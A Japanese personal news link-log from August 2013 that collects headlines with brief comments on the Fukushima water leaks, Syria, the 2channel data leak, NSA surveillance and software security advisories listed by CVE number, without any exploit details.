MS13-057 - 緊急: Windows Media フォーマット ランタイムの脆弱性により、リモートでコードが実行される (2847883) の更新プログラム、Windows 7、Server 2008 R2 用が 2013.08.14 に、 Windows XP、Server 2003、Vista、Server 2008 用が 2013.08.28 に再リリースされている。「WMV エンコードされたビデオが再生時に適切にレンダリングされないというアプリケーションの互換性の問題」が解決されているので、再リリース版のインストールが必要。
》 生徒転落、学校側は「いじられキャラと認識」 (読売, 8/27)。教員なんてしょせんこんなもん。 自殺に追い込まれそうなほどつらいなら、学校なんて行かなくてもいいから、 まっとうな窓口に相談しよう。命がいちばん大事。
》 匿名掲示板のはずが……2ちゃんねるの情報流出により暴言発覚 小説家の杉井光さんが謝罪 (ねとらぼ, 8/27)。人間性があからさまに暴露される。こういうのが一番恐い。 関連:
『神メモ』作者のラノベ作家杉井光氏が2ch流出情報から誹謗中傷をしていた事を認めて謝罪&本人スレに降臨 (なお、まにあわんもよう@なんJ, 8/27)
2ちゃんねる史上最大規模の個人情報流出事故をまとめてみた。(随時更新) (NAVER まとめ, 8/27)
》 在留カード大量偽造か中国人3人逮捕 (NHK, 8/27)、 在留カード (入国管理局)
》 国連事務総長 歴史認識巡り異例発言 (NHK, 8/26)、 国連事務総長発言「非常に疑問」 (NHK, 8/27)。いつもの潘基文氏、としか思えないんだが……。
》 マレーシア元首相 TPPは再び植民地化招く (NHK, 80/27)。マハティール氏。
》 つくられた放射線「安全」論 科学が道を踏みはずすとき (河出書房新社, 2/20 発売)
仮設タンクから汚染水が漏洩している件
福島第一原子力発電所構内H4エリアのタンクにおける水漏れについて (東電, 8/19)
福島第一原子力発電所構内H4エリアのタンクにおける水漏れへの対応状況について (東電, 8/21)
H4タンクエリアにおける漏えいについて (東電, 8/21)
福島第一原子力発電所構内におけるボルト締めタンクの総点検結果について (東電, 8/22)
H4タンクエリアにおける漏えいに関する調査状況について (東電, 8/24)
H4エリア外周(ドレン弁)および H4エリア近傍排水路法面(山側)の線量測定結果 (東電, 8/26)
汚染水漏れ:使い回しタンクから漏出 地盤沈下後に移設 (毎日, 8/24)
汚染水漏れ:「タンク、金かけず作った」協力会社会長証言 (毎日, 8/25)。鋼製 (ステンレスじゃない)、ボルト止め (溶接じゃない)。
流出経路の反対側でも高い放射線量測定 (NHK, 8/27)
福島第一原子力発電所 3号機原子炉建屋1階南西エリアのガレキ等障害物撤去について (東電, 8/26)。日立のレイバー、ASTACO-SoRa イン・アクション。 Packbot が支援。
関連: 日立、原発建屋内での作業支援用双腕重機型ロボット「ASTACO-SoRa」を発表 (マイナビニュース, 2012.12.10)
原子力発電所の建てられた場所は元々どんな場所だったか (togetter, 8/27)。じゃぼじゃぼ。
》 原発 ストレステスト義務化へ (NHK「かぶん」ブログ, 8/27)。5 年ごと。
》 はだしのゲン:増刷続々 閲覧制限問題で関心高まる (毎日, 8/27)
》 シリア:米、化学兵器使用と断定 政権の責任追及 (毎日, 8/27)。関連:
米海軍、シリア沖にミサイル駆逐艦増強 化学兵器対策か (CNN, 8/25)。3→4。
米国防総省当局者によると、地中海に新たに出動したのは巡航ミサイル搭載駆逐艦「ラメージ」。既に展開中の同型駆逐艦「マハン」と交替予定だったが、マハンの一時的な任務継続も決まった。米海軍は地中海に常時、巡航ミサイル搭載の駆逐艦3隻を配備する。
使用なら「処罰」と国連事務総長 シリアの化学兵器疑惑で (CNN, 8/26)
シリア:神経毒症状3600人 1割死亡 国境なき医師団 (毎日, 8/26)、 Syria: Thousands suffering neurotoxic symptoms treated in hospitals supported by MSF (MSF, 8/24)
調査団が現地へ、米国務長官は政権非難 シリア化学兵器疑惑 (CNN, 8/27)
》 .CN ドメイン DNS サービスに対する DDoS 攻撃が発生 (8/25)
「.CN」ドメイン、過去最大規模の攻撃受ける=中国報道 (サーチナ, 8/26)
「.CN」ドメインにサイバー攻撃、近年で最大規模—中国 (新華経済, 8/26)
http://www.cnnic.cn/gjymaqzx/aqgg/aqggaqsj/201308/t20130826_41325.htm (CNNIC, 8/25 09:10)。 時刻は中国時間だろうなあ。日本と中国の時差は -1 時間だそうです。 これでいいのかな:
時刻 (8/25) | 事象 |
---|---|
00:00 AM | 攻撃開始 |
02:00 AM | 復旧 |
03:00 AM | 公式短報を発信 |
04:00 AM | 攻撃再開、最大規模 (継続中) |
「継続中」は 8/25 09:10 時点での記述。
中国の「.cn」ドメインにDDoS攻撃、多くのサイトが一時ダウン (CNET, 8/27)
Chinese Internet Hit by Attack Over Weekend (Wall Street Journal, 8/26)
Chinese authorities say massive DDoS attack took down .cn domain (The Register, 8/26)
According to Matthew Prince, CEO of web apps and monitoring firm CloudFlare, sites on the .cn domain saw a 32 per cent degradation in traffic during the attack, which peaked at around 6am UTC.
DDoS Attacks: China's Weekend of Irony (Akamai blog, 8/26)
》 風知草:小泉純一郎の「原発ゼロ」=山田孝男 (毎日, 8/26)
——今すぐゼロは暴論という声が優勢ですが
「逆だよ、逆。今ゼロという方針を打ち出さないと将来ゼロにするのは難しいんだよ。野党はみんな原発ゼロに賛成だ。総理が決断すりゃできる。あとは知恵者が知恵を出す」
「戦はシンガリ(退却軍の最後尾で敵の追撃を防ぐ部隊)がいちばん難しいんだよ。撤退が」
》 「2ちゃんねるビューア」利用者約3万件分のクレジットカード・住所・電話番号などがTor上に流出 (gigazine, 8/26)
2ちゃんねるビューアを運営しているN.T. Technologyは、ビューア利用者の個人情報が流出していることを認めており、現在、その該当範囲と原因について調査中だとのことですが、なぜか午前8時40分ごろ、このお知らせは削除されています。
関連:
2ちゃんねるビューアの運営会社からユーザーの個人情報が流出 (slashdot.jp, 8/26)
不正アクセスによるお客様情報流出に関するお詫びとご報告(再掲載/更新) (2ちゃんねるビューア)
》 VeriSign,vBSDconを支援 - インフラの信頼性と稼働性のためFreeBSDを併用] (FreeBSD Daily Topics, 8/26)
》 もんじゅの断層 追加調査指示へ (NHK「かぶん」ブログ, 8/26)
》 独身女性の卵子凍結を容認 (NHK, 8/23)
》 ブラインドひも絡まり乳児死亡 (NHK, 8/24)、 傷害速報 (日本小児科学会) の No.36 カーテンの留め紐による縊頸 と No.36「カーテンの留め紐による縊頸」の類似事例1。
この傷害に対して,「カーテンの留め紐に首を挟まれないよう注意しましょう」と指摘するだけでは予防できません.製品を改善することが必要です. (中略) 必要なことは,乳幼児の頚が引っかからない構造,また,引っかかったとしてもすぐにループが解除できるデザインにすることである.また,カーテンの留め紐の下端は床から1m 以上の高さになるように設置することや,ループ状の構造があり,幼児の体重がかかった時にループが外れない製品は子どもの生活環境から排除する必要がある.
利用者側としても、そういう観点から製品を選択することが大事かな。
この問題を巡っては、東京都が、先月からブラインドなどのひもを子どもの手の届く高さに設置しないよう注意の呼びかけを始めています。
これか: ブラインドやカーテンのひもに気をつけて! 今後、安全対策の検討に着手します (東京都, 7/5)
》 はだしのゲン:閲覧制限を撤回…松江市教委 (毎日, 8/26)
》 みずほ証-東証誤発注裁判、高裁がIT企業の責任に言及 バグは「容易に発見できれば重過失」 (日経 IT Pro, 8/16)
判決は多くのIT企業とサービス提供事業者にとって他人事ではない。というのも、今後はシステムを開発したIT企業が「バグを容易に発見できた」ことが認定されれば、それは開発を委託したサービス提供企業の重過失とみなされる可能性が高いからだ。
サービス提供者とIT企業は共に、開発工程における実装やテストなどを適切に進めたことを示せるよう、一定の証拠を残す必要がある。IT業界の標準値などと比べてバグの摘出傾向が正常かといった客観的なデータが求められる事態もあり得る。
》 Office 2003も来年4月にサポート終了、クラウドへの切り替えを急げ (日経 IT Pro, 8/26)。いや、別にクラウドじゃなくてもいいんですが。
Officeにはオンプレミス型の「Office Professional Plus 2013」や「Office Standard 2013」があるが、2月からはクラウド型の「Office 365 ProPlus」を用意している。
特にOffice 365 ProPlusはクラウド型なので最新のOfficeを常に利用できるし、脆弱性を修正するセキュリティ更新プログラムが公開された場合はすぐに適用される。脆弱性を放置しない仕組みなのでセキュリティの強化につながる。
Office 365 ProPlus (Microsoft)。1 ユーザーあたり 1,450円/月 ですか。 年契約だと 1,160円/月。
》 津波被害の大川小学校に慰霊碑 (NHK, 8/25)
》 「ミス・ティーンUSA」も被害に:PC内蔵カメラのハッキング (WIRED, 8/20)
》 時論公論 「安倍 対ロシア外交 北方領土交渉をどう動かすか」 (NHK 解説委員室, 8/20)
》 DEFCON CTFネットワークを可視化せよ (エフセキュアブログ, 8/22)
》 「KINS」は次なるオンライン銀行詐欺ツール「ZBOT」か (トレンドマイクロ セキュリティ blog, 8/23)
》 ZeroAccess、P2P プロトコルを変更して耐性を強化 (シマンテック, 8/22)
》 集団的自衛権の解釈を「是正」すべきとき (海国防衛ジャーナル, 8/16)
新聞やテレビでも集団的自衛権にまつわる記事を目にする機会があると思いますので、その際の予備知識となれば幸いです。ただ、私は集団的自衛権行使容認派です。その視点からの記事であること、さらには憲法改正ではなく、解釈変更によって行使解禁すべき、との立場であることをお含みおきください。
》 憲法解釈で首相に“10倍返し” 最高裁判事が見せた男の意地 (日刊ゲンダイ, 8/22)。山本庸幸判事の件。
》 徴兵制で現代戦は戦えない (海国防衛ジャーナル, 7/28)
そんな中で興味を惹いたのは、マンパワー(人的資源)に関する人民解放軍海軍(PLAN)の変化についての部分でした。数字で見ると、1985年には35万5,000人いたPLANは、2013年には21万5千人まで人員を削減しています。数百万の民兵がいたりするので、「中国といえば人海戦術」というようなイメージがあるかもしれませんが、質より量を重んじる固陋な考えは、もはや人民解放軍にはありません。確かに、現在も徴兵の制度自体は残っています。しかし、人民解放軍は志願兵だけで定員が満たされていて、徴兵制は実際のところ名ばかりのものとなっています。
中国ですら、こういう時代です。
》 警察政策フォーラム: サイバー空間の脅威への対策における新たな展開 〜産学官連携への期待〜 (警察庁)。2013.09.26、東京都千代田区、無料。
本フォーラムでは、法執行機関と産業界・学界等が一体となって対策を進めている米国NCFTAの代表者を招へいし、同組織の成り立ち、目的、役割や実績・効果等を紹介するとともに、産学官における相互連携に関する各主体のニーズ、新たな枠組みへの期待あるいは留意点等、サイバー空間の脅威に対する産学官の連携の在り方について、内外の実務家や研究者、企業関係者等を交えて幅広く議論し、理解を深めていくとともに、サイバー空間に関係するすべての国民に向けて広く情報発信することを目的とするものです。
文章が長過ぎる。
》 子ども用の花粉防御用眼鏡の安全性—衝突や転倒などによる目の周辺のけがを防ぐために— (国民生活センター, 8/22)
》 高齢者の新聞長期契約でトラブル多発 (NHK, 8/25)、 なかなか減らない新聞のトラブル—高齢者に10年以上の契約も!解約しようとしたら断られた!— (国民生活センター, 8/22)
》 MERS コウモリからも感染か (NHK, 8/24)。 エボラ の自然宿主はオオコウモリ科のコウモリだそうですが、MERS もコウモリなのかなあ。
》 チェックしておきたい脆弱性情報<2013.08.21> (日経 IT Pro, 8/21)
2014年1月1日から変更となるCVE番号の番号体系についての情報です。2013年7月17日、新番号体系がOption B(年+桁数可変:ただし、1〜999は4桁固定)となることが正式にアナウンスされました。
》 経産省スラップ訴訟のお粗末——被告を人間違え (週刊金曜日 / Yahoo, 8/21)
》 米国の「中立姿勢」の背景を解明 矢吹晋著「尖閣衝突は沖縄返還に始まる」 (21 世紀中国総研, 8/25)
》 【一迅社】2年前の「サイン色紙」読者プレゼントが未だに発送出来ていないとお詫び【秋田書店】 (NAVER まとめ, 8/24)。百合姫、なもり先生直筆サイン色紙 100 枚。
》 バラエティ番組「ドラゴンレイディ」藤岡弘、氏ご出演VTRに関する訂正とお詫び (フジテレビ, 8/20)。フジテレビ、あいかわらずだなあ。
関連: フジテレビからの謝罪文の掲載について (藤岡弘、オフィシャルブログ「藤岡弘、の侍道」, 8/23)
パシフィック・リムは日米同盟を描いたプロパガンダ映画だった、モンスターは中国の暗喩—中国軍機関紙 (KINBRICKS NOW, 8/23)
中国軍人脳とでもいうべきか。どんな小ネタも米国や日本の中国をおとしめる陰謀に変換し、「自強せねばならぬ!」という結論に持っていくロジックをじっくり楽しんで欲しい。 なおネタバレ要素もあるのでご注意を。
巨大ロボットがペガサス流星拳?!映画「パシフィック・リム」中国語版の“神翻訳”と中国字幕翻訳者ブラック話 (KINBRICKS NOW, 8/24)
一方日本は……: 声優・杉田智和さんが語る、映画『パシフィック・リム』吹き替え版の台本で「エルボーロケット」が急遽「ロケットパンチ」になった理由 (オレ的ゲーム速報@刃, 8/23)。現場がふつうの仕事をしたら、ワーナーの偉い人がロケットパンチに変えさせたwww。
》 LINEにデマを流してスパム業者が儲けてる?新しいタイプのデマとデマを金曜日に流す理由 (情報科学屋さんを目指す人のメモ, 8/24)
それはなぜかと言うと、NAVER_LINEの公式Twitterアカウントの対応が、土日を挟んだ月曜まで行われないからです。
実は、超大規模に流行したデマの流行は、@NAVER_LINEが「デマに注意してください」とアナウンスすることで強力に抑制されます。したがって、大規模な流行を狙うとしたら、金曜日が狙い目なのです。
何それ……。24h/365d 運用じゃないの?!
Release of Cacti 0.8.8b (Canti, 2013.08.06)。remote から任意のコマンドを実行できる欠陥 CVE-2013-1435 が修正されているそうで。
VMSA-2013-0010: VMware Workstation host privilege escalation vulnerability (VMware, 2013.08.22)。VMware Workstation 8 / 9、VMware Player 4 / 5 に欠陥。 Linux ベースのホスト上で vmware-mount コンポーネントが権限上昇を招く。CVE-2013-1662
Security vulnerability in Citrix XenServer PV guest kernel loading could result in privilege escalation (Citrix, 2013.06.27)。 libelf の欠陥。 XenServer 5.0〜6.2 用の hotfix。 CVE-2013-2194 CVE-2013-2195 CVE-2013-2196
FreeBSD-EN-13:03.mfi - data corruption with mfi(4) JBOD disks > 2TB (FreeBSD-announce ML, 2013.08.22)。FreeBSD 9.1-RELEASE の mfi(4) において、JBOD で 2TB を越える書き込みをするとデータ破壊が発生。
FreeBSD-SA-13:09.ip_multicast - integer overflow in IP_MSFILTER (FreeBSD-announce ML, 2013.08.22)。 FreeBSD の IP マルチキャストで integer overflow、非特権プロセスがカーネルメモリを読み書きできる。センシティブ情報の漏洩や権限上昇が可能となる。 CVE-2013-3077
FreeBSD-SA-13:10.sctp - Kernel memory disclosure in sctp(4) (FreeBSD-announce ML, 2013.08.22)。 FreeBSD の SCTP state cookie の初期化処理に欠陥があり、カーネルメモリの一部が漏洩してしまう。センシティブ情報の漏洩や権限上昇が可能となる。 CVE-2013-5209
》 脅えるアメリカ社会 ボストンマラソン爆弾事件の衝撃 (ダイヤモンドオンライン, 8/23)
【PC遠隔操作事件】写真はiPhoneで撮られていた! (江川 紹子 / Yahoo, 8/22)
ところでこの「ラストメッセージ」について、検察官は第4回公判前整理手続で、「ラストメッセージをマスコミに配布したのか?」「それを判断したのは誰か?」などと詰問。「開示証拠の目的外使用だ」と論難した、という。
この「ラストメッセージ」は、「真犯人」が作成した文章の中で、最も長文で情報量が多く、この事件や犯人について考える手がかりがたくさん含まれており、むしろ警察の方から公表し、国民に情報提供を呼びかけるべきだった。現に、警察はウェッブサイトやフェイスブックを使って、「犯行声明メール」や「自殺予告メール」などを公表し、情報提供を呼びかけていた。なのに、なぜ、最も情報量が豊富な「ラストメッセージ」を隠していたのか。むしろ、そちらが問われなければならないのではないか。
「検察は証明できなければ無罪になるだけ」と言い放った・佐藤博史弁護士らが記者会見 (videonewscom / YouTube, 8/22)
シリア政権軍が神経ガス使用か、首都郊外で「200人超死亡」と活動家 (ロイター, 8/21)
シリアで化学兵器使用疑惑報告に驚愕:事務総長 (国連情報誌SUNブログ対応版, 8/22)
シリア情勢(22日) (中東の窓, 8/23)
シリア内戦 反体制派「毒ガス攻撃、1300人以上死亡」 政権側は否定 (産経, 8/22)
136人の死亡確認 人権監視団 (産経, 8/22)
西側諸国、シリアの有毒ガス使用への対応にジレンマ (ウォール・ストリート・ジャーナル日本版, 8/23)
》 木語:「終戦の日」の主人公=金子秀敏 (毎日, 8/22)
はたとわが誤解に気がついた。「終戦の日」とは「天皇が戦争を終わらせる命令を下した日」のことであって、「戦争が終わった日」ではなかったのだ。
「戦争が終わった日」はミズーリでの降伏調印の日 (1945.09.02) ですね。
「終戦の日」は、なにより「終戦の詔勅(しょうちょく)」を下した昭和天皇の記念日であり、その結果、戦争動員体制から解放された日本国民の記念日でもある。
こう考えると、終戦の日になにを記念するのかは明白だろう。戦争から国民を自由にした詔勅である。ひいては再び国民が戦争に動員される事態が起きないよう祈る日だ。勝ち負けとは別の問題だ。この日、全国戦没者追悼式に天皇、皇后両陛下が臨席される道理も納得できる。
》 「LINE疲れ」に陥る学生たち 「返信は義務」80% 既読機能が苦痛に (ITmedia, 8/23)
》 陸自ヘリ機体 解体されず輸出 (NHK, 8/23)
解体することを条件に民間業者に売り払われた陸上自衛隊のヘリコプターの機体などが、解体されないまま、オーストラリアなどに輸出されていたことが分かりました。
》 AWSもAzureも信用できない PRISMスキャンダルでスイスのクラウド需要が急増 (TechTarget, 8/22)
スイスのホスティング需要が急激に拡大した理由は、同国ではプライバシーが法的に守られていることにある。スイスはEU非加盟であり、汎ヨーロッパ協定の対象にならず、EU加盟国はもちろん、米国とデータを共有する義務を負わない。
》 「yaplog!」で4411件、「ポイントタウン」で4502件、不正ログインの可能性 (Internet Watch, 8/22)
》 金言:リーダーシップ=西川恵 (毎日, 8/23)。書籍「採用基準」 (ダイヤモンド) について。
現在は独立し、キャリア形成の啓蒙(けいもう)活動に携わる著者は、日本人に欠けているのは英語力でも、論理的思考でもなく、リーダーシップだと言う。リーダーシップとは部下を率いる上司の力量といった狭い話でなく、ポストや役職にかかわらず本来全員が発揮すべきもので、目先の問題解決に率先して当たる積極的な態度を言っている。
(中略)
欧米では若者が何のてらいもなく横断歩道でさっと高齢者に手を貸し、乗り物では席を譲る。それは「目先の問題解決に率先してかかわる」というリーダーシップのなせるワザで、彼らが日本人より感情のヒダが深いのでも、情に優れているからでもないのだ。
》 福島のコメの全量全袋検査の実態 (togetter, 8/23)。測っているのは JA 向けのみ。
》 はだしのゲン、売れ行き3倍に 閲覧制限問題で注文増 (朝日, 8/22)。当然こうなる。
ゲン関係:
「はだしのゲン」の利用制限:日本図書館協会、松江市教育委員会に利用制限措置について再考を求める要望書を送付 (国立国会図書館, 8/23)
はだしのゲン:鳥取市立中央図書館が閲覧制限を撤回 (毎日, 8/23)
「ゲン」閲覧制限の背景は (NHK, 8/22)
》 【|と◯】知ってる? アプリや電機のスイッチと電源ボタンの記号の意味 (appllio, 6/19)。1 と 0。
地下 (汚染された地下水が遮水壁を突破して海へ)
WEB特集・汚染水 福島第一原発で何が (NHK「かぶん」ブログ, 8/9)
その量について、経済産業省は1日当たり300トン。 ドラム缶にすると1500本分に上るという概算の数字を示しました。 ただ、この数字が正確なものかは分かっていません。
汚染水流出 不確か試算 (東京, 8/9)
汚染拡大の原因となる地下水の海への流出量の試算値を、東電が一日当たり四百トンとはじいたのに対し、政府は三百トン。食い違う数字が混乱を招いている。試算のやり方を詳しくみていくと、どちらも不確かなことが多い。こんな数字を基に対策を立てていいのか、疑問が多い。
福島第一原発 汚染水の本格的なくみ上げ (NHK「かぶん」ブログ, 8/15)
地上 (仮設タンクから超高濃度汚染水 300 トンが地上を経由して海へ)
タンク汚染水漏れ、「レベル3」相当 福島第一原発 (朝日, 8/21)
追及解説・原発汚染水漏れ問題 (NHK, 8/22)
例えばこのタンク、これは大小合わせて1000基以上設置されていますが、漏えいを自動で検知する装置は付いていません。そこで東電は一日2回、作業員がタンクの見回りをしています。しかしひとつひとつ見るのではないんですね。20基ほどを堰で囲っていて、堰に汚染水がたまっていないかどうかを確認するだけなんです。
ただこの方法でも過去4回は数リットル漏れた程度で検知できていました。しかし現場では2日に1基の割合でタンクが増え続けていて、今の人員、やり方ではもう追いつかなくなって、大量漏えいしてしまった可能性があると思います。
福島第1原発:汚染水流出 トレンチから直接流出か 海へ推計30兆ベクレル (毎日, 8/22)
タンク汚染水漏れ 堰の排水弁すべて開放 海に流出可能性大 (東京, 8/22)
福島第1原発の汚染水封じ込め、メルトダウン以来最大の試練 (ウォール・ストリート・ジャーナル日本版, 8/22)
しかし、政府の関与が強まったとしても、東電や政府の対応は後手に回っており、支離滅裂で近視眼的、なおかつ遅いという批判は強い。
焦点:汚染水問題で危機深まる福島第1原発、海洋放出にも高い壁 (ロイター, 8/22)
別のタンク2基でも汚染水漏れか…高い放射線量 (読売, 8/22)
デスラー「古代、ガミラス本星の戦いを覚えているか。お前達は地下の火山脈を撃ち、天井都市を頭上から見舞った。真上と真下……脆いものよのう」
》 ネット選挙 削除の申請はなし (NHK「かぶん」ブログ, 8/14)
》 自殺予防 メディア関係者のための手引き(2008年改訂版日本語版) (内閣府)。マスメディアの人達、おもいっきり無視してますね。
》 NSA 方面 (PRISM、Verizon 通話記録収集等)
海底ケーブルを流れる情報が傍受されて諜報機関に売られていることが判明 (gigazine, 8/22)
北カリフォルニアの光ファイバー技術関連企業「Glimmerglass」社の海底ケーブルの信号を傍受するソフトウェア「CyberSweep」が政府系機関に提供されていることがわかり、このソフトウェアを使えばGmailやYahoo!メール、FacebookやTwitterなどの内容を分析し、「行動を起こすのに十分なレベル」の情報を入手することが可能だということが明らかになりました。
米NSAが市民のメール情報も収集、当局の公表文書で判明 (ロイター, 8/22)
NSAは米国ネット通信の75%を監視可能---米メディアが報道 (日経 IT Pro, 8/22)
》 サイバー攻撃:「やりとり型」急増 企業へメール後仕掛け (毎日, 8/22)、 平成25年上半期のサイバー攻撃情勢について (警察庁, 8/22)。標的型メール攻撃の件。 標的型メール攻撃の件数自体は前年同期比で -63.6% と大幅に減少している。
》 正社員の解雇は2千万円かけても好きなようには出来ない! (壇弁護士の事務室, 8/22)。
あれである。向井先生の記事を読んだような しつこい退職勧奨をされた場合は、 当事務所にご相談をということにしておこう。
》 薄被告、初公判で起訴事実否認—当局はブログ通じ異例の公表 (ウォール・ストリート・ジャーナル日本版, 8/23)。 薄氏は 186cm の長身だが、中国当局はそれを上回る警官 2 名を探してきて横につけたようで。
》 災害時におけるペットの救護対策ガイドライン (環境省, 8/20)
》 Bytecode - Covering the Android Vulnerabilities Master Key and Extra Field (VRT, 8/22)。ClamAV 話。
》 Wiresharkの各種履歴を削除する方法 (Eiji James Yoshidaの記録, 8/22)
》 Lawrence Lessig Strikes Back Against Bogus Copyright Takedown (EFF, 8/22)。BGM はやっぱり帝国マーチなんだろうか。
【社告】毎日新聞の報道に対する弊社の見解について(平成25年8月22日改訂) (秋田書店, 8/21)
8月21日の本欄へ掲載した文中の一部に事実誤認がありました。毎日新聞からの取材を弊社が一切受けていないとの記述は誤りであり、毎日新聞社からの指摘にしたがい、ここに削除・訂正し、毎日新聞社に対してお詫び申し上げます。
「社告」でこういうレベルの誤認識をする会社、ですか……。 さもありなんって感じ。
首都圏青年ユニオン声明 「秋田書店「見解」はブラック企業の開き直りである」 (首都圏青年ユニオン, 8/22)。当該女性と首都圏青年ユニオンによる告発によって消費者庁が動いたことが明らかに。
女性社員が加入する首都圏青年ユニオンは、秋田書店と団体交渉をおこない不当解雇の撤回と不正をやめることを訴えた。秋田書店は、首都圏青年ユニオン側が繰り返し不正を指摘したことに開き直り続け、さらに女性社員に対する根拠のない懲戒解雇の撤回を拒否して現在に至っている。女性社員と首都圏青年ユニオンは、事態解決に向けて2012年夏に消費者庁への資料提供をおこなった結果、今回の秋田書店への措置命令が出されたものであり、私たちの主張の正しさを確信している。
しかしながら、秋田書店は、毎日新聞2013年8月21日付夕刊報道を受けて、「【社告】毎日新聞の報道に対する弊社の見解について」という文書をウェブ上に掲げている。この中で、「解雇の理由は、元社員が賞品をほしいままに不法に窃取したことによるもの」としているが、こうした事実は一切、存在しない。こうしたことを根拠なく主張し懲戒解雇をおこなったこと自体が許しがたいことである。消費者庁からの措置命令を受けて、秋田書店の問題解決に向けた誠実な対応を期待していたが、秋田書店は今もなお開き直り続けている。
Listening:秋田書店・景品水増し 不正訴えた社員解雇 (毎日, 8/22)
8年前から読者プレゼント水増し 秋田書店「常態化」認めるも、内部告発理由の解雇は否定 (J-CAST, 8/22)
秋田書店景品問題における社員告発とそれへの反論 (togetter, 8/21)。「件の秋田書店の話題ですが景品納めてた会社の領収証がしっかりあり景品は元担当社員によって横流しをされていた、が事実」 という Nami mam @tutu_nini 氏の主張の顛末。
[Announce] [security fix] GnuPG 1.4.14 released (GnuPG, 2013.07.25)。GnuPG 1.4.14、Libgcrypt 1.5.3 公開。 cache side-channel attack を受ける欠陥が修正されている。 CVE-2013-4242
Puppet Enterprise 2.8.3 / 3.0.1、Puppet 2.7.23 / 3.2.4 公開。
Announce: Puppet Enterprise 2.8.3 Available [ Security Release ] (Puppet Announce, 2013.08.16)。 CVE-2013-4956 CVE-2013-4761 CVE-2013-4073
Announce: Puppet Enterprise 3.0.1 Available [ Security Release ] (Puppet Announce, 2013.08.16)。CVE-2013-4073 CVE-2013-4761 CVE-2013-4762 CVE-2013-4955 CVE-2013-4956 CVE-2013-4958 CVE-2013-4959 CVE-2013-4961 CVE-2013-4962 CVE-2013-4963 CVE-2013-4964 CVE-2013-4967 CVE-2013-4968
Announce: Puppet 2.7.23 Available [ Security Release ] (Puppet Announce, 2013.08.16)。 CVE-2013-4956 CVE-2013-4761
Announce: Puppet 3.2.4 Available [ Security Release ] (Puppet Announce, 2013.08.16)。 CVE-2013-4956 CVE-2013-4761
WSUS サーバーから配信した更新プログラムの内容と "インストールされた更新プログラム" の表示内容が一致しない (Japan WSUS Support Team Blog, 8/20)
ユーザーが更新プログラムを手動でインストールできないようにし、バックグラウンドでの自動インストールのみに制御したい。 (Japan WSUS Support Team Blog, 8/22)
Windows Update の "更新履歴の表示" が示す内容について (Japan WSUS Support Team Blog, 8/22)
「更新履歴の表示」は、更新プログラムの適用有無を判断する材料としては使うことができない情報であり、また今後の更新プログラムの適用動作には一切影響しないことから、削除しても差し支えありません
》 韓国、また敵意むき出し潜水艦! 反日色の濃い艦名「金佐鎮」 (ZAKZAK, 8/14)、歴史を忘れた民族に未来はない (環球閑話時事の徒然 IZA見参, 8/15)。
ブラッドリー・マニング被告に35年の禁錮刑--WikiLeaksへの軍事機密漏えいの罪で (CNET, 8/22)
ブラッドリー・マニング二等兵の厳しい判決は、政府の情報漏洩に対する妥協なき戦いを示している (techcrunch, 8/22)
》 集団的自衛権行使容認「非常に難しい」 最高裁判事会見 (朝日, 8/20)。ふつうはそう思いますよね。
最高裁・山本判事の会見詳細 (朝日, 8/20)
最高裁・山本判事の会見詳細 (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 8/21)
》 グーグル、広島・長崎の原爆資料公開 (壇弁護士の事務室, 8/20)
松江市教委事務局、独断で要請 「はだしのゲン」閲覧制限 (中国新聞, 8/20)、 「はだしのゲン」閲覧制限は事務局決定 (NHK, 8/20)。事務局だけで勝手に決めました、ですか。
「はだしのゲン」貸出禁止にモノ申す! 言論の自由が、ヘイトスピーチに屈する社会 (東洋経済オンライン, 8/18)
「はだしのゲン」閲覧制限は正義か?〜最近の保守派の一部はどうも度量が狭くなってきた (ハフィントンポスト, 8/20)。週刊少年ジャンプ連載時に読んだという人による記事。
はだしのゲン:「閉架必要なし」16校 松江市教委調査 (毎日, 8/22)
はだしのゲン 彼に平和を教わった (東京, 8/21)
ウヨの人ってどうして放置プレイできないんだろう。 騒ぐと結局、ゲンの CM になるだけなのに。
》 シリーズ東日本大震災 津波浸水域 命をどう守るか 〜震災2年半 問われる防災〜(仮) (NHK スペシャル, 9/27 放送予定)
》 Theory of Everything "神の数式"に挑む 第1回 "重さ"とは何か〜"物質の根源"をめぐる科学者たちの闘い〜(仮) (NHK スペシャル, 9/21 放送予定)、 Theory of Everything "神の数式"に挑む 第2回 この世は4か11か?〜"時空"を巡る最後の格闘〜(仮) (NHK スペシャル, 9/22 放送予定)
》 『武雄市が中心になった(自称)自治体通販 #FB良品 薬事法違反の疑いか?』 #たけお問題 (NAVER まとめ, 8/20)
》 ソニー、FeliCaを利用した電子お薬手帳を開発、川崎市で試験へ (Internet Watch, 8/19)
》 原子力規制庁 下北半島の地下調査へ (NHK, 8/21)。ようやく。
》 人類が経験した最大の気候変動、10万年周期の 氷期-間氷期サイクルのメカニズムを解明 (東京大学, 8/8)。「氷期-間氷期が10万年周期で交代する大きな気候変動は、日射変化に対して気候システムが応答し、大気−氷床−地殻の相互作用によりもたらされたものである」
》 「秘密保全法案」概要まとまる (NHK, 8/22)、 秘密保全法制とは? (日弁連)
》 「GM作物の遺伝子」で有害雑草の成長力が向上(WIRED.jp) (WIRED, 8/22)
》 2013年上半期、日本国内の持続的標的型攻撃を分析 (トレンドマイクロ セキュリティ blog, 8/21)、政府機関や企業を狙うサイバー攻撃、独自プロトコルを使うマルウエアが急増 (日経 IT Pro, 8/22)。APT の話。
》 Mac Antivirus Solutions Compared (ZDNet, 8/21)。AV-Comparatives。
The tests don't reveal a lot of difference in malware detection between the products, but AV-Comparatives used only 20 samples. They say "In our opinion, these 20 malicious Mac apps represent a substantial part of all recent Mac malware from the first half of 2013." If so, it underscores just how little attention is being paid to Macs by the malware authoring community.
いかに Mac でマルウェアが流行っていないか、という。
》 オンラインゲームの攻防戦 (togetter, 8/22)
》 GSが衝撃試算「中国バブル崩壊で不良債権300兆円規模」 リーマン級ショック (ZAKZAK, 8/20)。GS = ゴールドマン・サッスク。衝撃に備えよ。
実際にゴールドマンは今年5月、中国の最大手国有銀行、中国工商銀行の全持ち株を売却していることも、中国経済の深刻さを投資家に意識させている。
》 大阪府警でまた虚偽調書か 窃盗事件で署員の手柄装う (中国新聞, 8/21)
》 【爆笑注意】日本で学生が冷蔵庫に入ったと炎上してるその頃米軍では・・・ (NAVER まとめ, 8/22)。涙出てきた。
》 来たるべき終末に備えてゾンビの傾向と対策をしっかり押さえられる「ゾンビサバイバルガイド」 (gigazine, 8/13)、ゾンビサバイバルガイド (エンターブレイン)。例の本、邦訳が出たのですね。
